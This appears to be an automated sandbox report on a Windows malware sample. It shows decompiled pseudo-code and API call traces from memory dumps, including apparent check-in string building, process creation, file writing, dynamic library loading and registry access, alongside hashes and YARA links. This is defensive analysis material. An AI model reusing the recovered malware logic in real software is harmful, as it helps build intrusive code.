Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 32508ea5a5b0319435ad94379a7272996326a69a17e14620aabf5c1e2856443a
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 142106369042059FCB00DFADC8809B7B7AAFF49350B068469DA158B245D730FA55DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AF24, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00B0AF24(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00B0B08F(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00B0B149(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00B0B034(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00B0B08F(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00B0B12B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00b0af28
0x00b0af29
0x00b0af2a
0x00b0af2d
0x00b0af2f
0x00b0af32
0x00b0af33
0x00b0af35
0x00b0af36
0x00b0af37
0x00b0af3a
0x00b0af44
0x00b0aff5
0x00b0affc
0x00b0b005
0x00b0af4a
0x00b0af4a
0x00b0af50
0x00b0af56
0x00b0af59
0x00b0af5c
0x00b0af60
0x00b0af65
0x00b0af6a
0x00b0afea
0x00000000
0x00b0af6c
0x00b0af6c
0x00b0af78
0x00b0af7a
0x00b0afd5
0x00b0afd5
0x00b0afdb
0x00000000
0x00b0af7c
0x00b0af8b
0x00b0af8d
0x00b0af8e
0x00b0af8f
0x00b0af92
0x00b0af92
0x00b0af94
0x00000000
0x00b0af96
0x00b0af96
0x00b0afe0
0x00b0af98
0x00b0af98
0x00b0af9c
0x00b0afa4
0x00b0afa9
0x00b0afae
0x00b0afba
0x00b0afc2
0x00b0afc9
0x00b0afcf
0x00b0afd3
0x00000000
0x00b0afd3
0x00b0af96
0x00b0af94
0x00000000
0x00b0af7a
0x00b0afee
0x00b0afee
0x00b0afee
0x00b0af6a
0x00b0b00a
0x00b0b011

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 77e241276a77357761203f975ea12f0c9cf6c4400b0fec7f7a024f820d8fe54f
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 9E21B6729002059FCB14EF68C8C09ABBFE5FF44350B0585A8E956DB285EB30FA15CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00670CBE, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.817845410.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee3aab4d27810b8d9cd25841f6a61a676339dad171df1625d0682f8e12b95b0f
Instruction ID: 048c85a312ef3b458f9b4259d5cf733f4c538797587d10ef4eebd91284bf3280
Opcode Fuzzy Hash: ee3aab4d27810b8d9cd25841f6a61a676339dad171df1625d0682f8e12b95b0f
Instruction Fuzzy Hash: F1E07C30A00031EBAF139A27CC88A037F23FB9EB503028580A0041902CCB721422EBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00670C49, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.817845410.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb599caeb1eae8013df42ada62d0ce89a52a1d975edf36dea8a0147df739efb6
Instruction ID: 53f039dac2c01ff57d9590357c5a7e6d0e53ac754010bd959b3103f23090cf42
Opcode Fuzzy Hash: bb599caeb1eae8013df42ada62d0ce89a52a1d975edf36dea8a0147df739efb6
Instruction Fuzzy Hash: 7BE00C35A44031EBAF129E67CD88A477F23EB8EB5170281D0A4041902CDB721462EB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B06109, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00B06109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xb0d018; // 0x6a85f48
				asm("bswap eax");
				_t61 =  *0xb0d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0xb0d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xb0d00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0xb0d2e0; // 0xdca5a8
				_t3 = _t64 + 0xb0e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0xb0d02c,  *0xb0d004, _t59);
				_t67 = E00B05B60();
				_t68 =  *0xb0d2e0; // 0xdca5a8
				_t4 = _t68 + 0xb0e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E00B01BBF(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0xb0d2e0; // 0xdca5a8
					_t7 = _t126 + 0xb0e8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0xb0d270, 0, _v8);
				}
				_t73 = E00B0137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0xb0d2e0; // 0xdca5a8
					_t11 = _t121 + 0xb0e8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0xb0d270, 0, _v8);
				}
				_t146 =  *0xb0d364; // 0x18d95b0
				_t75 = E00B03857(0xb0d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0xb0d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xb0d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xb0d270, _t152, _v20);
						goto L26;
					}
					E00B0A811(GetTickCount());
					_t82 =  *0xb0d364; // 0x18d95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xb0d364; // 0x18d95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xb0d364; // 0x18d95b0
					_t148 = E00B01974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0xb0d270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0xb0c2ac);
					_push(_t148);
					_t94 = E00B038CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xb0d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E00B01922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E00B047D5();
						L22:
						HeapFree( *0xb0d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E00B0365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E00B03273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E00B04AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E00B08FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00B04AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x00b06109
0x00b06109
0x00b06109
0x00b06112
0x00b0611b
0x00b0611d
0x00b0611d
0x00b0612a
0x00b06135
0x00b06138
0x00b0613d
0x00b06146
0x00b06149
0x00b0614e
0x00b06151
0x00b06156
0x00b06159
0x00b06165
0x00b06172
0x00b06174
0x00b0617a
0x00b0617f
0x00b0618a
0x00b0618c
0x00b0618f
0x00b06191
0x00b06196
0x00b0619c
0x00b061a1
0x00b061a4
0x00b061a9
0x00b061b6
0x00b061b8
0x00b061be
0x00b061c8
0x00b061c8
0x00b061ca
0x00b061cf
0x00b061d4
0x00b061d7
0x00b061dc
0x00b061e9
0x00b061eb
0x00b061f9
0x00b061f9
0x00b061fb
0x00b06209
0x00b0620e
0x00b06210
0x00b06215
0x00b063d6
0x00b063e0
0x00b063e9
0x00b0621b
0x00b06227
0x00b0622d
0x00b06232
0x00b063ca
0x00b063d4
0x00000000
0x00b063d4
0x00b0623e
0x00b06243
0x00b0624c
0x00b0625d
0x00b06261
0x00b0626a
0x00b06270
0x00b0627f
0x00b06286
0x00b0628f
0x00b06295
0x00b063be
0x00b063c8
0x00000000
0x00b063c8
0x00b062a1
0x00b062a7
0x00b062a8
0x00b062ad
0x00b062b2
0x00b063b4
0x00b063bc
0x00000000
0x00b063bc
0x00b062bb
0x00b062c2
0x00b062ca
0x00b062cf
0x00b062d8
0x00b062e3
0x00b062e8
0x00b062ed
0x00b063ec
0x00b063a0
0x00b063a0
0x00b063a5
0x00b063b0
0x00b063b2
0x00000000
0x00b063b2
0x00b062f7
0x00b062fc
0x00b06301
0x00b06306
0x00b06316
0x00b06319
0x00b0631f
0x00b06325
0x00b0632b
0x00b0632e
0x00b06334
0x00b06337
0x00b0633c
0x00b06340
0x00b06340
0x00b0634c
0x00b06358
0x00b0635c
0x00b0635e
0x00b06363
0x00b06365
0x00b0636a
0x00b0636f
0x00b0637c
0x00b06384
0x00b06387
0x00b06387
0x00b06363
0x00000000
0x00b0634e
0x00b06352
0x00b06389
0x00b0638c
0x00b06395
0x00000000
0x00000000
0x00000000
0x00000000
0x00b06395
0x00b06354
0x00000000
0x00b06354
0x00b0634c

APIs

GetTickCount.KERNEL32 ref: 00B0611D
wsprintfA.USER32 ref: 00B0616D
wsprintfA.USER32 ref: 00B0618A
wsprintfA.USER32 ref: 00B061B6
HeapFree.KERNEL32(00000000,?), ref: 00B061C8
wsprintfA.USER32 ref: 00B061E9
HeapFree.KERNEL32(00000000,?), ref: 00B061F9
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B06227
GetTickCount.KERNEL32 ref: 00B06238
RtlEnterCriticalSection.NTDLL(018D9570), ref: 00B0624C
RtlLeaveCriticalSection.NTDLL(018D9570), ref: 00B0626A

Part of subcall function 00B01974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00B04653,?,018D95B0), ref: 00B0199F
Part of subcall function 00B01974: lstrlen.KERNEL32(?,?,?,00B04653,?,018D95B0), ref: 00B019A7
Part of subcall function 00B01974: strcpy.NTDLL ref: 00B019BE
Part of subcall function 00B01974: lstrcat.KERNEL32(00000000,?), ref: 00B019C9
Part of subcall function 00B01974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00B04653,?,018D95B0), ref: 00B019E6

StrTrimA.SHLWAPI(00000000,00B0C2AC,?,018D95B0), ref: 00B062A1

Part of subcall function 00B038CA: lstrlen.KERNEL32(018D9AF0,00000000,00000000,7691C740,00B0467E,00000000), ref: 00B038DA
Part of subcall function 00B038CA: lstrlen.KERNEL32(?), ref: 00B038E2
Part of subcall function 00B038CA: lstrcpy.KERNEL32(00000000,018D9AF0), ref: 00B038F6
Part of subcall function 00B038CA: lstrcat.KERNEL32(00000000,?), ref: 00B03901

lstrcpy.KERNEL32(00000000,?), ref: 00B062C2
lstrcpy.KERNEL32(?,?), ref: 00B062CA
lstrcat.KERNEL32(?,?), ref: 00B062D8
lstrcat.KERNEL32(?,00000000), ref: 00B062DE

Part of subcall function 00B01922: lstrlen.KERNEL32(?,00000000,018D9B10,00000000,00B074FF,018D9CEE,?,?,?,?,?,69B25F44,00000005,00B0D00C), ref: 00B01929
Part of subcall function 00B01922: mbstowcs.NTDLL ref: 00B01952
Part of subcall function 00B01922: memset.NTDLL ref: 00B01964

wcstombs.NTDLL ref: 00B0636F

Part of subcall function 00B03273: SysAllocString.OLEAUT32(?), ref: 00B032AE

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

HeapFree.KERNEL32(00000000,?,?), ref: 00B063B0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B063BC
HeapFree.KERNEL32(00000000,?,?,018D95B0), ref: 00B063C8
HeapFree.KERNEL32(00000000,?), ref: 00B063D4
HeapFree.KERNEL32(00000000,?), ref: 00B063E0

Strings

Ut, xrefs: 00B06196

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 3748877296-8415677
Opcode ID: 1c8b33d7b6218222156a7e7e4ec8cca942b9ab7f4bbae4e108bdab2349c55f96
Instruction ID: 8294b410b585426e60ab83bebc9e7ba17f58cf1398dde902ef167f338e368d64
Opcode Fuzzy Hash: 1c8b33d7b6218222156a7e7e4ec8cca942b9ab7f4bbae4e108bdab2349c55f96
Instruction Fuzzy Hash: 45912771900209EFCB119FA8DC89AAE7FB9FF18350F148495F909E72A1DB31D911DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B6241D, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B62432

Part of subcall function 00B6A406: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B5D4C8,?,00000000,-00000007,00B6F475,-00000007,?,00000000), ref: 00B6A415
Part of subcall function 00B6A406: mbstowcs.NTDLL ref: 00B6A431

lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 00B6246B
wcstombs.NTDLL ref: 00B62475
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 00B624A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B57B15), ref: 00B624D2
TerminateProcess.KERNEL32(?,000003E5), ref: 00B624E8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B57B15), ref: 00B624FC
GetLastError.KERNEL32 ref: 00B62500
GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B62520
CloseHandle.KERNEL32(?), ref: 00B6252F
CloseHandle.KERNEL32(?), ref: 00B62534
GetLastError.KERNEL32 ref: 00B62538

Strings

D, xrefs: 00B62446

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D
API String ID: 2463014471-2746444292
Opcode ID: ae3d8d0fad84cfe2755ec280cc42bee763c3bc7732b5ca61114d48b5823652e2
Instruction ID: f2779d5d1b2d38b4cc51e74159a4016d531a01f4bbaf263eaa88e87218e8a498
Opcode Fuzzy Hash: ae3d8d0fad84cfe2755ec280cc42bee763c3bc7732b5ca61114d48b5823652e2
Instruction Fuzzy Hash: 8B410BB1901618FFEB11EFA4CD85EEEBBB9EB04344F2040A9E506B7110EB759E449B61

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B4E1, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000), ref: 00B5B4F8
lstrlen.KERNEL32(?,?,00000000), ref: 00B5B4FF
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5B516
lstrcpy.KERNEL32(00000000,?), ref: 00B5B527
lstrcat.KERNEL32(?,?), ref: 00B5B543
lstrcat.KERNEL32(?,?), ref: 00B5B554
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5B565
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5B602
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 00B5B63B
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00B5B654
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B5B65E
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00B5B66E
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B5B687
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00B5B697

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID:
API String ID: 333890978-0
Opcode ID: f249896409d3ce17a82e2d11a6a6ad8c34a799b01f334caa4890517a5746fed2
Instruction ID: b8dea5849cfdcd1dd44cf39efd48d7e0bd7eb0e1a44a26127224e227e504acdb
Opcode Fuzzy Hash: f249896409d3ce17a82e2d11a6a6ad8c34a799b01f334caa4890517a5746fed2
Instruction Fuzzy Hash: EE516C76400108FFCB01AFA4DC88EAEBBBDFB49344B1585A6FA1597130DB319A4ADF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B58BDD, Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,00B664E2,?,?), ref: 00B58BEA

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,00B664E2,?,?), ref: 00B58C13
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00B58C33
lstrcpyW.KERNEL32(-00000002,?), ref: 00B58C4F
SetCurrentDirectoryW.KERNEL32(?,?,?,?,00B664E2,?,?), ref: 00B58C5B
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,00B664E2,?,?), ref: 00B58C5E
SetCurrentDirectoryW.KERNEL32(74E068C0,?,?,?,00B664E2,?,?), ref: 00B58C6A
GetProcAddress.KERNEL32(00000000,?), ref: 00B58C87
GetProcAddress.KERNEL32(00000000,?), ref: 00B58CA1
GetProcAddress.KERNEL32(00000000,?), ref: 00B58CB7
GetProcAddress.KERNEL32(00000000,?), ref: 00B58CCD
GetProcAddress.KERNEL32(00000000,?), ref: 00B58CE3
GetProcAddress.KERNEL32(00000000,?), ref: 00B58CF9
FreeLibrary.KERNEL32(00000000,?,?,?,00B664E2,?,?), ref: 00B58D22

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID:
API String ID: 3772355505-0
Opcode ID: 345d401266208e26c4b5bafd522276b149749ca2bfdeb0e3bd440f30abe29f67
Instruction ID: e1ffe07901b1e6deb766c3aad1dbb1aab29474e6bdfe2d4742ee287cd20f4e16
Opcode Fuzzy Hash: 345d401266208e26c4b5bafd522276b149749ca2bfdeb0e3bd440f30abe29f67
Instruction Fuzzy Hash: F8315EB150020AAFD710EFA4DC84E6A7BFCEF04745B0484AAF909D72A1DF34EA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B6C4DA, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,74E05520,?,00000000,?,00000000), ref: 00B6C4F0
lstrlen.KERNEL32(?), ref: 00B6C4F8
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B6C508
lstrcpy.KERNEL32(00000000,?), ref: 00B6C527
lstrlen.KERNEL32(?), ref: 00B6C53C
lstrlen.KERNEL32(?), ref: 00B6C54A
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00B6C598
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 00B6C5BC
lstrlen.KERNEL32(?), ref: 00B6C5EF
HeapFree.KERNEL32(00000000,?,?), ref: 00B6C61A
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 00B6C631
HeapFree.KERNEL32(00000000,?,?), ref: 00B6C63E

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID:
API String ID: 904523553-0
Opcode ID: 03341cb623ef828423ae66aa78c4366f81610fcac6a7bceb172c3e8ff48beff9
Instruction ID: cee8ae326d0c561cfdd3804ecdfaffb4c07bcecfba2fdbce3d9a5fc90124ecd6
Opcode Fuzzy Hash: 03341cb623ef828423ae66aa78c4366f81610fcac6a7bceb172c3e8ff48beff9
Instruction Fuzzy Hash: 5E41587290024AAFCF129FA4CC84AAE7FBAFB48310F1084A6F91597160DB74EE51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B56D8C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 00B56DB6
GetCurrentThreadId.KERNEL32 ref: 00B56DCC
GetCurrentThread.KERNEL32 ref: 00B56DDD

Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E56F
Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF), ref: 00B6E588
Part of subcall function 00B6E55D: GetCurrentThreadId.KERNEL32 ref: 00B6E595
Part of subcall function 00B6E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E5A1
Part of subcall function 00B6E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00B77545,00002334), ref: 00B6E5AF
Part of subcall function 00B6E55D: lstrcpy.KERNEL32(00000000), ref: 00B6E5D1

Part of subcall function 00B5B917: lstrlen.KERNEL32(00000000,00000001,00000000,?,?,00000001,?,00000000,74E05520,00000000,?,00B56E27,?,?,?,00000000), ref: 00B5B982
Part of subcall function 00B5B917: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000001,?,00000000,74E05520,00000000,?,00B56E27,?,?,?,00000000), ref: 00B5B9AA

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?), ref: 00B56E57
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,?,00000000,00000000,?,?,?), ref: 00B56E63
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B56EB2
wsprintfA.USER32 ref: 00B56ECA
lstrlen.KERNEL32(00000000,00000000), ref: 00B56ED5
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B56EEC

Strings

W, xrefs: 00B56E9F

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: W
API String ID: 630447368-655174618
Opcode ID: fe3be674aaaca8bc52c1a226003222da5a44259db49600782ed0520e292b3e07
Instruction ID: a0f2c0326692323ad79ddef05f8a5311f58b034ac349195a22b2f44855522ec5
Opcode Fuzzy Hash: fe3be674aaaca8bc52c1a226003222da5a44259db49600782ed0520e292b3e07
Instruction Fuzzy Hash: 2A418C79902119EBCF11AFA4DC49EAE7FF9FF45741B0040A5F909A3220DB349A95DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B75651, Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B7567C

Part of subcall function 00B7622F: RegCloseKey.ADVAPI32(?,00B56102), ref: 00B762B6

RegOpenKeyA.ADVAPI32(80000001,00B56102,?), ref: 00B756B7
lstrcpyW.KERNEL32(-00000002,00B81460), ref: 00B75719
lstrcatW.KERNEL32(00000000,?), ref: 00B7572E
lstrcpyW.KERNEL32(?), ref: 00B75748
lstrcatW.KERNEL32(00000000,?), ref: 00B75757

Part of subcall function 00B75AD8: lstrlenW.KERNEL32(00000000,00000000,?,00B75776,00000000,?,?,?,00B56102), ref: 00B75AEB
Part of subcall function 00B75AD8: lstrlen.KERNEL32(00B75776,?,00B75776,00000000,?,?,?,00B56102), ref: 00B75AF6
Part of subcall function 00B75AD8: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00B75B0B

